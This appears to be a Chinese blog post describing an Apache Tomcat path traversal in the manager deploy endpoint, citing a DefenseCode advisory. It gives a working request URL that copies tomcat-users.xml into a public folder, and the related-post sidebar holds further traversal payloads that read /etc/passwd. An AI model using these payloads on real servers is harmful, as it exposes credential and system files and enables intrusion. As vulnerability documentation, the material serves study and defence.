Exploit - Apache Tomcat Directory/Path Traversal

最新推荐文章于 2024-04-07 09:38:59 发布
最新推荐文章于 2024-04-07 09:38:59 发布
阅读量2.3k 收藏
点赞数
分类专栏: exploit

Apache Tomcat Directory/Path Traversal

http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users

Previous URL would copy file named D:/TESTING/Java/run/apache-tomcat- 7.0.76/conf/tomcat-users.xml to destination folder http://localhost/manager/ under the name of users. As we’ve seen in previous code snippets, .xml extension will be added to each file that is copied.
Following image contains browser requesting target URL directly and application response in that case

exploit

As we can see from the previous image, application response is “FAIL - Failed to deploy application at context path /foo##/../../../../webapps/manager/users”, but file is copied anyway.
We can confirm that with direct request for users.xml file in webroot of manager application - http://localhost:8080/manager/users.xml .

exploit successfully

References

http://www.defensecode.com/advisories/DC-2017-03-001_DefenseCode_ThunderScan_SAST_Apache_Tomcat_Security_Advisory.pdf

Nixawk
关注
专栏目录
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1592
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 993
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
tomcat7.02版本,保证可用
03-11
tomcat的7.02版本,保证可用。楼主用着挺好的。谢谢大家。
Apache Tomcat v.5.5.26 Directory Traversal
cnbird's blog
01-30 1647
http://127.0.0.1:7021/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
tomcat RequestDispatcher directory traversal vulnerability
cnbird's blog
01-16 907
CVE-2008-5515: Apache Tomcat information disclosure vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.39 Tomcat 5.5.0 to 5.5.2
python脚本验证Apache Tomcat Examples Directory Vulnerabilities
lirunling的博客
09-28 4751
本人最近在做项目实训,在用AWVS扫描的时候遇到了Apache Tomcat Examples Directory Vulnerabilities漏洞。那么问题来了,如何利用python脚本验证此漏洞,话不多说,直接上代码(python3.6.0上亲测有效),此代码参考了网上别人写的部分代码 #!/usr/bin/env python import urllib.request
网站安全(13) ——目录穿越漏洞(Directory Traversal)
weixin_30301183的博客
05-26 1819
如果应用程序使用用户可控制的数据,以危险的方式访问位于应用服务器或其它后端文件系统的文件或目录,就会出现路径遍历。 攻击者可以将路径遍历序列放入文件名内,向上回溯,从而访问服务器上的任何文件,路径遍历序列叫“点-点-斜线”(..\) http://***/go.action?file=..\..\etc\passwd 避开过滤第一种是过滤文件名参数中是否存在任何路径遍历序列(..\)如...
kali渗透学习-弱点扫描(未完成,安装原因空闲时候再来安装)
weixin_43239236的博客
01-23 243
发现漏洞 国际上漏洞机构 SCAP (Security Content Automation Protocol) SCAP是一个集合了多种公开的安全标准的框架,这些公开的安全标准被称为SCAP Element,SCAP版本1.0包含六个Element:XCCDF、OVAL、CVE、CCE、CPE、CVSS。SCAP包含了Protocol与Content,Protocol规范了Element之间如何协同工作,Content指按照Protocol的约定,利用Element描述的生成应用于实际检查工作的数据,其实
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5545
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Web中间件常见安全漏洞
KHOST的博客
03-19 8355
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
path-traversal-servlet:演示目录遍历的简单 Servlet
06-26
路径遍历servlet 演示目录遍历的简单 Servlet 运行应用程序 mvn tomcat7:run 到试试
Tomcat5.5的一个问题
阿杰的博客
07-25 259
第一天来公司上班的时候,竟然被配置WEB程序的问题搞了半天。郁闷至极。 上班也有一年了,连个基础的东西都搞不定,难怪被本人鄙视 在tomcat的/conf/server.xml中配置连接池。 插入以下代码 factory org.apache.commons.dbcp.BasicDataSourceF...
Apache中的加密访问详解
weixin_44310047的博客
05-13 872
Apache中的加密访问 通常我们在访问浏览器如www.taobao.com时,页面会自动跳转以https方式进行访问,https服务相比于http多了加密功能,其服务页面基本都具有登录入口。一般来说,用户用浏览器访问服务器时,会在自己的客户主机中输入用户名和密码,输入完成后通过网络传输给服务器进行验证。为了保证用户名和密码的安全性,在传输前浏览器会对用户名和密码等传输数据使用一些技术手段进行加密,同时为了保证传输数据的不可伪造性,还会生成相应的证书;当服务器接收到客户主机传输来的数据后会先对用户证书进行校
Tomcat 样例目录暴露(低危)
热门推荐
打代码的小女孩
06-06 1万+
Apache Tomcat样例目录session操纵漏洞 0x00 背景 前段时间扫到的漏洞,研究了下,感觉挺有意思的,发出来和大家分享下,有啥不对的地方还请各位拍砖指正。 Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例,其中session样例(/examples/servlets/servlet/SessionExample)允许用户对sess...
反向代理映射实现Tomcat目录遍历
voctor2436的博客
05-08 2507
反向代理映射实现Tomcat目录遍历
【漏洞复现】Apache log4j RCE 远程代码执行漏洞(CVE-2021-44228)
qq_45244158的博客
12-14 5758
Log4j任意代码执行RCE(CVE-2021-44228)前言一、漏洞描述二、受影响的版本三、复现过程1.从Vulfocus靶场获取测试环境2.攻击过程四、修复建议1.升级到最新版本2.缓解措施3.流量查询 前言 2021年11月24日,阿里云安全团队正式向Apache报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2的部分功能具有递归分析功能,攻击者可以直接构造恶意请求触发远程代码执行漏洞。 一、漏洞描述 Apache Log4j2 是一个基于 Java 的日志工具。这
[Java-sec-code]PathTraversal学习
feng的博客
08-29 531
前言 目前JavaWeb刚学到Servlet,看了一下接下来的东西,还剩下一大堆要学,脑子疼,照这种进度看下去得2-3个月才能看到SpringBoot,把SpringBoot看完就正式去全身心Java代审了。不过太浮躁了,暂时还是想学学Java代码审计,正好有个比较适合入门的Java安全项目:Java-sec-code。用SpringBoot写的,把许多的漏洞都给了个demo还有修复。正好我之前稍微接触过SpringBoot,勉强能看得懂,就也稍微跟着这个项目学习一下。其实主要还是长长见识,只是换一种方式看
Web的基本漏洞--命令执行漏洞RCE
尽欢的博客
05-31 1724
命令执行漏洞介绍
探索CDGXStreamDeserRCE:一款强大的序列化反序列化漏洞利用框架
最新发布
gitblog_00043的博客
04-07 318
探索CDGXStreamDeserRCE:一款强大的序列化反序列化漏洞利用框架 项目地址:https://gitcode.com/0xf4n9x/CDGXStreamDeserRCE 在网络安全的世界里,序列化和反序列化是常见的数据交换过程,但它们也可能成为攻击者的切入点。CDGXStreamDeserRCE是一个精心设计的工具,专注于帮助安全研究人员和渗透测试人员分析和利用Java中的反序列化...
https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html
06-12
这是一个关于开发Metasploit模块的文档,具体来说是使用BrowserExploitServer(BES)编写浏览器漏洞利用模块。 BES是Metasploit框架中的一个组件,它可以用于利用浏览器漏洞,其中包括了一些javascript代码,能够在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值